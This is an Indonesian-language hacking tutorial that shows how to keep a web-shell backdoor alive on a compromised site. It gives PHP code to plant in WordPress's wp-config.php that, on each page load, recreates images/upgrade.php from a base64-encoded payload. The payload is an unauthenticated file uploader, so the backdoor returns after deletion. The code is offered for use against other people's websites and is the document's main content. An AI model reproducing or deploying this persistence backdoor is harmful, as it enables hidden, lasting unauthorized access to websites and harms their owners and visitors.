Menyembunyikan Backdoor Dalam File Internal Website

Assalamu'alaikum Wr Wb

Kali ini Saya akan memberi tips agar SHELL BACKDOOR tidak terhapus oleh defacer - defacer idiot :v
Jadi Langsung Saja Kita Bahas Bagaimana Cara nya.

Source Code :

<?php
if (file_exists("images/upgrade.php")){
}else{
echo '<b>Backdoor Created ~></b> <a href="images/upgrade.php"/>upgrade.php</a>';
mkdir("images", 0777);
$img = fopen('images/upgrade.php', 'w');
$sec = base64_decode("PD9waHAKaWYoaXNzZXQoJF9QT1NUWydTdWJtaXQnXSkpewokZmlsZWRpciA9ICIiOwokbWF4ZmlsZSA9ICcyMDAwMDAwJzsKCiR1c2VyZmlsZV9uYW1lID0gJF9GSUxFU1snaW1hZ2UnXVsnbmFtZSddOwokdXNlcmZpbGVfdG1wID0gJF9GSUxFU1snaW1hZ2UnXVsndG1wX25hbWUnXTsKaWYgKGlzc2V0KCRfRklMRVNbJ2ltYWdlJ11bJ25hbWUnXSkpIHsKJGFib2QgPSAkZmlsZWRpci4kdXNlcmZpbGVfbmFtZTsKQG1vdmVfdXBsb2FkZWRfZmlsZSgkdXNlcmZpbGVfdG1wLCAkYWJvZCk7CgplY2hvIjxjZW50ZXI+PGI+RG9uZSA9PT4gPGEgaHJlZj0nJHVzZXJmaWxlX25hbWUnIHRhcmdldD0nX2JsYW5rJz4kdXNlcmZpbGVfbmFtZTwvYT48L2I+PC9jZW50ZXI+IjsKfQp9CmVsc2V7CmVjaG8nPGNlbnRlcj4KPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249IiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImltYWdlIj48aW5wdXQgdHlwZT0iU3VibWl0IiBuYW1lPSJTdWJtaXQiIHZhbHVlPSJTdWJtaXQiPjwvZm9ybT48L2NlbnRlcj4nOwp9Cj8+");
fwrite($img ,$sec);
fclose($img);
}
?>

Tips Ini Mengandalkan file internal website (file yang ada di websitemya) jadi lebih efektif.
Kenapa Harus File internal?
Karena Kita jdi mudah buat akses nya,contoh di cms Wordpress ada wp-config.php
Nah kita letakkan saja Code diatas di file wp-config.php nah nanti pas file kita yang di site.com/images/upgrade.php di hapus oleh seseorang jadi bisa muncul lagi.
Caranya tinggal Buka saja site.com/ <~ karena kita menaruh source code diatas di wp-config.php otomatis shell/uploader ter created lgi di folder /images/

Sekian Tutorial dari saya , kurang lebihnya mohon maaf
Wassalamualaikum wr wb